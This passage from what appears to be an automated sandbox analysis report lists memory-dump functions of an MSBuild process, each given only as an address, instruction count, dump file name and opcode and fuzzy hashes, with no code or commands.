                        • Instruction Fuzzy Hash: F331E8707006098BEB54DF79D96426EBBE3EFC4710B148069E485D7398DF38D881CB51
                        Function 0676492D Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fb4c78437b90e003189beb22326a9148c972b5efec11db4aeed9b105fa21232
                        • Instruction ID: 28e6a77d6d862b1914a71f760d7692a4f8495a5955f83f8775f05ffe13bcaafa
                        • Opcode Fuzzy Hash: 0fb4c78437b90e003189beb22326a9148c972b5efec11db4aeed9b105fa21232
                        • Instruction Fuzzy Hash: BF41F674A00205DFDB54DFA8D594AA9BBF2FF48305F108469E905DB351DB329D42CB50
                        Function 0101D320 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 990f440ba7a4d2cc338eb73df70eaa3948dc71f8f2953dfbe1823d04fa06c138
                        • Instruction ID: da3b213ceefcb7b77e893cb4937d5c422f021426c18941aeaf577cfc8f9dbe84
                        • Opcode Fuzzy Hash: 990f440ba7a4d2cc338eb73df70eaa3948dc71f8f2953dfbe1823d04fa06c138
                        • Instruction Fuzzy Hash: 8F313D347402088FD758DF69C4A9AAE7BF6EF89310F1454A8E5069B3A5DF399C41CB90
                        Function 0673E12B Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 958909e25d80246ddef1a631b988003ae6f604f0b165c02b0582cd618d270add
                        • Instruction ID: e9f1e0b53e39bbdc7e48f3e638bcc4ab29132a53bdf4e223a64b4782ed17ab4e
                        • Opcode Fuzzy Hash: 958909e25d80246ddef1a631b988003ae6f604f0b165c02b0582cd618d270add
                        • Instruction Fuzzy Hash: A1415034E10619DFCB44EFB4D958AADBBB2FF85300F148569E506AB361DF70A946CB80
                        Function 0101292C Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c17b3fe20f427937d1728def08a389059d0a3da725d92cc5a2efceffcfd000c5
                        • Instruction ID: 532924d86fa35a5f4b12d1817cb9fc22bce6deda8bfc91aae0a0b9461e6748c4
                        • Opcode Fuzzy Hash: c17b3fe20f427937d1728def08a389059d0a3da725d92cc5a2efceffcfd000c5
                        • Instruction Fuzzy Hash: 2A4102B1D003499FCB20CFA9C584ADEBFF5EF48314F248429E809AB254D775A949CB90
                        Function 06739057 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6af7536e3d34000cf6f3daf81c6047bc6d554f9572e128ac84737d399d37536b
                        • Instruction ID: be7cddf5845f360be04ef45b78c9e35c22edbe4a5a06b89a2709419fdfa6788d
                        • Opcode Fuzzy Hash: 6af7536e3d34000cf6f3daf81c6047bc6d554f9572e128ac84737d399d37536b
                        • Instruction Fuzzy Hash: DA416F71E00228CFDB54DFA9D8846ADB7B6FF44314F248169D605BB252E7719D45CB80
                        Function 0673B967 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0786cb2496aaf094d1fe95a9a2001a22e46807c753465773ee48712ba94a1f80
                        • Instruction ID: 8f4d8a9b47c59fffbbac72f24a0c09a2b641b9161505d6f0899cd673177e6d94
                        • Opcode Fuzzy Hash: 0786cb2496aaf094d1fe95a9a2001a22e46807c753465773ee48712ba94a1f80
                        • Instruction Fuzzy Hash: 4C31A135A00118DFCB50EFA4D8959EEBBB6EF98610F048529E90AA7255DF309946CB90
                        Function 066FE708 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83ad2f9f474a906f5215383d0533237ae3918502abedee38038e72c59db688d8
                        • Instruction ID: 43ff9bb3c97686a9cfc935e35fd4c9eb157ee7bef2636930e22ee8ce9e5833e3
                        • Opcode Fuzzy Hash: 83ad2f9f474a906f5215383d0533237ae3918502abedee38038e72c59db688d8
                        • Instruction Fuzzy Hash: CF317030700656EFC704DF68D98486ABB76FF85310704866AD9069B75ADB30ED85CBE1
                        Function 067361A0 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 086d863413fc1747ea9dd1722373e879054ba05650270aa331304afbcbfe65f4
                        • Instruction ID: 2476d125aad0eec9c751c452e42521a58f84df1c09ecd20074c948a082fbdda3
                        • Opcode Fuzzy Hash: 086d863413fc1747ea9dd1722373e879054ba05650270aa331304afbcbfe65f4
                        • Instruction Fuzzy Hash: 5031C030B11324AFC759EB74D824AAD7BA6BF8A300F00456DE546DB395DF35DC458B81
                        Function 067348CC Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31712dff886410d46737b637a607fefa76fc06b47dec2e4ea645399ca9117f6d
                        • Instruction ID: 828852831a623f2d211d8b254f1dac2923d050e8f2a2e36083151482a5f0ea2d
                        • Opcode Fuzzy Hash: 31712dff886410d46737b637a607fefa76fc06b47dec2e4ea645399ca9117f6d
                        • Instruction Fuzzy Hash: 043144397163698FCB592F34A02D06D7FA6AF8A202304956EF903CB395DE3A8C41CB55
                        Function 0101D960 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84d945749c1dc83f4344237ef877df281f29d84e0c5ab882e436f4dd08f92d05
                        • Instruction ID: 5391c208d653ca442ba2f3ebe2528e969840234a362a2d35ed7211a583ce2335
                        • Opcode Fuzzy Hash: 84d945749c1dc83f4344237ef877df281f29d84e0c5ab882e436f4dd08f92d05
                        • Instruction Fuzzy Hash: F5312B31E1071ACFCB11EFB8D4552EABBB1FF85310B10862BD445A7245EF34A985CB80
                        Function 06738848 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b88abe44828df2948ae88d2485f2c4b6ea9e9e0b873c9f7dafe1e2b4cc53042d
                        • Instruction ID: c2996d245a42ffc109c672e0fbfc44493e0724963198f92d572a6b16ace155b3
                        • Opcode Fuzzy Hash: b88abe44828df2948ae88d2485f2c4b6ea9e9e0b873c9f7dafe1e2b4cc53042d
                        • Instruction Fuzzy Hash: 6E315A34A1021ACFCB14CF68D9809AAB7F2FF88310B258555E845AB325D730ED45CBA2
                        Function 01012938 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87090747a7eeba1ee2464a25915bb9fb2e0e6d7d8ee793322d94e24303b02d1c
                        • Instruction ID: 3f7c09a91424ea8478a57eb787eb3a8d38d1dafa3d0361aeab344492184e23b0
                        • Opcode Fuzzy Hash: 87090747a7eeba1ee2464a25915bb9fb2e0e6d7d8ee793322d94e24303b02d1c
                        • Instruction Fuzzy Hash: E741FEB1D003499FDB10DFA9C584A9EBFF5AF48310F208429E809AB254DB75A989CB90
                        Function 067666F8 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 720131f44099dc7d4102505eba37bb5ba0972d8102b8c83b0207734a05e87f45
                        • Instruction ID: f372b9ff40ea700a8cabd6beb458d0511ae529e6c2ffa6df026638747d1149f3
                        • Opcode Fuzzy Hash: 720131f44099dc7d4102505eba37bb5ba0972d8102b8c83b0207734a05e87f45
                        • Instruction Fuzzy Hash: F03172702003048FC725DF29D984A6EFBA2FF84310F448B69E5468B366DB74E98DCB95
                        Function 01016664 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75b80794be888dcf0cfbbfab5f25de14f187360f1838b558e80b6d61c5a99f3a
                        • Instruction ID: 8e77a22b1bb8fee564888358fab44995c3faaa897a8b60e9182e023ba62d2ae5
                        • Opcode Fuzzy Hash: 75b80794be888dcf0cfbbfab5f25de14f187360f1838b558e80b6d61c5a99f3a
                        • Instruction Fuzzy Hash: BE319F39B001148FCB04EB68E89596DB7F3EFC8710B248928E906E7359DE39AC41CB91
                        Function 06730853 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01881f8b4667f2a3c53f16761de3a654a3601e9fd5f0a24f13b08ddaf4e1b343
                        • Instruction ID: 91426ec89337d6c23ea7a78c3d63442544da83379cf04fa6e015fcfffbff8e17
                        • Opcode Fuzzy Hash: 01881f8b4667f2a3c53f16761de3a654a3601e9fd5f0a24f13b08ddaf4e1b343
                        • Instruction Fuzzy Hash: F631E231A017159FEB24CFB5D4547EABBF5EF48310F00852DE486A7241DB70A845CBE0
                        Function 06738838 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b8f271058e4c1f50d8ba81523c31d43936f48b515e0e733d4188417675f35d8
                        • Instruction ID: c727fd2559c2454036505086b7c3b7fb49ab28f3b972aeb2ac457f959e282734
                        • Opcode Fuzzy Hash: 4b8f271058e4c1f50d8ba81523c31d43936f48b515e0e733d4188417675f35d8
                        • Instruction Fuzzy Hash: F7317135A1021ACFCB10CF68D9809AAB7F1FF88310B258555E844AF366D730FD46CBA2
                        Function 010108B8 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ccaae97b9cd726066f9ce0b6248ffbb15b27e730af1c44fa48e5b80bdaa5a725
                        • Instruction ID: 639637a943c071cb54bb890fe695bf3e47662b8748de58aa87f331a1b1fc6404
                        • Opcode Fuzzy Hash: ccaae97b9cd726066f9ce0b6248ffbb15b27e730af1c44fa48e5b80bdaa5a725
                        • Instruction Fuzzy Hash: 0D31A470B006058BEB55DF79D96426EBBE3AFC4710B188169D485CB298DF38C881CB91
                        Function 0673FA08 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8157c74b729ac273ab408897c7a61a5592743d5b72d8ea51c0e92b0a4cc53906
                        • Instruction ID: ffc3560eaa828c41d0419eb5e64d0e1080ba9edc6fbc07fc92140266ba1d201f
                        • Opcode Fuzzy Hash: 8157c74b729ac273ab408897c7a61a5592743d5b72d8ea51c0e92b0a4cc53906
                        • Instruction Fuzzy Hash: 5721E770F003258FCB55EF69D8909BEBBF1EF86240B01866AD4069B356EB38DD45CB91
                        Function 0673B978 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bae55e83123bde3253d49140013be39d6e0c709d8ff28ded20b626f88bf1b52
                        • Instruction ID: 28cbf62f8abce188c2dee952fe4d0c6841a810e55f66a742e55b202d2edaf6b1
                        • Opcode Fuzzy Hash: 1bae55e83123bde3253d49140013be39d6e0c709d8ff28ded20b626f88bf1b52
                        • Instruction Fuzzy Hash: D0318231A00219DFCB50DFA4D8949AEBBB6EF98310F108569F906A7354DF30AD46CBD1
                        Function 0673FA18 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6764be9906e8ebd7af694b93eb56e3bbe255d2f33ae8f21b173674189c63c14d
                        • Instruction ID: 167b8a366564cd658cb071e4773baf579963308fa04bad736a435988b2c7b924
                        • Opcode Fuzzy Hash: 6764be9906e8ebd7af694b93eb56e3bbe255d2f33ae8f21b173674189c63c14d
                        • Instruction Fuzzy Hash: CD21D670F003298FCB44EF69D89096EB7F5EF89240B008629E4068B31AEF38DD45CB91
                        Function 06736E08 Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1355ad0797edf5b2dff450ef4146b04db7cac17f1cc4a264e8552eb26c3e66d4
                        • Instruction ID: c80c67827fabefd48ba6c8a3444749f6004f6d7fcaf4c92139d98b60217844f0
                        • Opcode Fuzzy Hash: 1355ad0797edf5b2dff450ef4146b04db7cac17f1cc4a264e8552eb26c3e66d4
                        • Instruction Fuzzy Hash: 66210431B003289FCB056B74EC548BE7BAAFFC6210B10466AE40197395DE355C46C7E1
                        Function 066F0429 Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b031c14f144731d8079117d1b9c00ed22ce99ab8fbca8df5603d7af4b1d43592
                        • Instruction ID: d59ecd8e6d6c520104e31ad9fdc2ba85ca8456bac74acc0586c8973a8ae55183
                        • Opcode Fuzzy Hash: b031c14f144731d8079117d1b9c00ed22ce99ab8fbca8df5603d7af4b1d43592
                        • Instruction Fuzzy Hash: 8211AC30B102059F8B14DB69D8909BFBBFAEF85280304802AE909DB356DA30ED0487B1
                        Function 066F1018 Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f49ce8251a305dcec55015d985f00c253434903828dc3ee291a7f4801b0936aa
                        • Instruction ID: ce0869cb663143958000983830eb2ff87652610a538c81e4e674940f7f9b19b0
                        • Opcode Fuzzy Hash: f49ce8251a305dcec55015d985f00c253434903828dc3ee291a7f4801b0936aa
                        • Instruction Fuzzy Hash: 4B314A75640640CFC355DF29D888919FBF2FF9A210B19859AE54ACB772CB70EC45CB90
                        Function 0101D9A0 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff927d731d6a73158af75b2dc34bd9b77336cdf800711a22a74b0378dbf43364
                        • Instruction ID: d4214a21c3416c12c689a7579a4bb7302a6781336aaab217d67ab40fab3eb28b
                        • Opcode Fuzzy Hash: ff927d731d6a73158af75b2dc34bd9b77336cdf800711a22a74b0378dbf43364
                        • Instruction Fuzzy Hash: DA31E635E1071ACBCB10AFB9D8541AEF7B5FF84300B10862AD45AB3344EF35A981CB80
                        Function 0673C2F8 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7eee429cdc5d22b4fcf72a0ccb3a8384eeffb6c514deddec8ab9a0cd272e70c6
                        • Instruction ID: cfe160a15f24764d65e35cc4e4b32c28297efcd4ae9cd57d84bbf165a4b1d9af
                        • Opcode Fuzzy Hash: 7eee429cdc5d22b4fcf72a0ccb3a8384eeffb6c514deddec8ab9a0cd272e70c6
                        • Instruction Fuzzy Hash: AC21D435A452589FDB539A78DC006A93F21AF56360F188252FA24AB2E3D732D460D793
                        Function 06737EB0 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 934220d23c4ee7439eab94559167aac592520f6a6ef7e025867da7492db19633
                        • Instruction ID: ee49b31a08cd3b7cbb2566195c9aa53dff12ba1b5911142b91aa86a12f8e0dfc
                        • Opcode Fuzzy Hash: 934220d23c4ee7439eab94559167aac592520f6a6ef7e025867da7492db19633
                        • Instruction Fuzzy Hash: D2219274B001258FDB14CF98D8C09AAB7F5FF88204B24856AE909D7306E731EC06CBA4
                        Function 00F2D6A8 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab4410c05cc807fcf044874eb7e3cde9360831cb3af32add1de3bf336daef8d7
                        • Instruction ID: 0f0e092ce4af18d8bdfe200c6a18b8ebaf1f397595819fc3170ecd15cd55664d
                        • Opcode Fuzzy Hash: ab4410c05cc807fcf044874eb7e3cde9360831cb3af32add1de3bf336daef8d7
                        • Instruction Fuzzy Hash: E3213672500240DFCF05DF14E9C0B16BFA5FB98324F20C269ED094B255C33AD816EBA1
                        Function 067372AF Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c867398493e3b61820ea86bc46f2003e548913e4ebd5870f0d377e75d3c74259
                        • Instruction ID: b6f12ad03f7a1869bda1014e810585d0621600f3b14654381a69f28cd5b46709
                        • Opcode Fuzzy Hash: c867398493e3b61820ea86bc46f2003e548913e4ebd5870f0d377e75d3c74259
                        • Instruction Fuzzy Hash: EF214AB0E002699FCB18CBE5C984AEDBFF5AF89300F148069E805EB369DB759D45CB54
                        Function 00F2D45C Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ea74af3ec3354eaf00da2aac2e96f9bf7496d21b0bd6c6a424fb202b4ffbd0e
                        • Instruction ID: 5cf60bfe3718c946143f06f0ca926228d722328a1e0205527f3b213c0884d08b
                        • Opcode Fuzzy Hash: 9ea74af3ec3354eaf00da2aac2e96f9bf7496d21b0bd6c6a424fb202b4ffbd0e
                        • Instruction Fuzzy Hash: A1214972504200EFDB05EF14E9C0B27BF65FB98324F34C569E8094B256C376D856E7A2
                        Function 00F2D548 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 03795429b04187352032e2e40535bb88333449f16550ef7316c6aed3b0242f87
                        • Instruction ID: 7476a6c920c5267e1203f2b3af341f6c778ee323051f3583dc506a613279c356
                        • Opcode Fuzzy Hash: 03795429b04187352032e2e40535bb88333449f16550ef7316c6aed3b0242f87
                        • Instruction Fuzzy Hash: CB213772904200DFDB05DF14EAC4B27BF65FB98328F24C569E80A4B256C376D856E7A2
                        Function 06760D50 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28a2f496ab893fbce9ae6bceac4d4274184ce3fbd5b7335065cac3701165d8fe
                        • Instruction ID: a1f3a42b060c069ae4d2ee1fc2adad2c40243dbf9c1d4b48c2375769931df508
                        • Opcode Fuzzy Hash: 28a2f496ab893fbce9ae6bceac4d4274184ce3fbd5b7335065cac3701165d8fe
                        • Instruction Fuzzy Hash: F2212678B005118FC744CF6ADA8886ABBF6FF8971572541A9E905EB371CB30ED05CB60
                        Function 066FF73B Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc0fc3a87b9a85a437971b2e91af076e33636139c0378e81b2e568aea53b69d2
                        • Instruction ID: 9daf690079c0ea692d131070b66e506852aacee8bf218221d36e01dc4901eff0
                        • Opcode Fuzzy Hash: fc0fc3a87b9a85a437971b2e91af076e33636139c0378e81b2e568aea53b69d2
                        • Instruction Fuzzy Hash: 21215B345152049FCB55DFB9F8849A6FFB5EF45310B0580AAE649C7212DB30E942CBE1
                        Function 0673FBC9 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cea5770d62d93e2710d1efde81c17bbbd5f222408bd992c0062a1fed35937727
                        • Instruction ID: 1d9de7f0459f66fd07428973bff455fa3b6cbd01c3e0164769ff94a0d60bbd9c
                        • Opcode Fuzzy Hash: cea5770d62d93e2710d1efde81c17bbbd5f222408bd992c0062a1fed35937727
                        • Instruction Fuzzy Hash: 37113B72F443785FCB95AFA8581027A7FE6CB82140F0442F6EA54CB253D93C8906C791
                        Function 06760870 Relevance: .1, Instructions: 73COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15f0277e476fe7e9335fdca8044f487808e6b770a22e8948af3b9925d35585a2
                        • Instruction ID: dcebe40c8846ad583fdc225c62b6bacb0ac49f825a8e80ff815105084ec4cc63
                        • Opcode Fuzzy Hash: 15f0277e476fe7e9335fdca8044f487808e6b770a22e8948af3b9925d35585a2
                        • Instruction Fuzzy Hash: 8B214171A007059FC760CE6EDA4486BBBF6BF992107148729F955C7266D730EC05CB90
                        Function 066F93D9 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
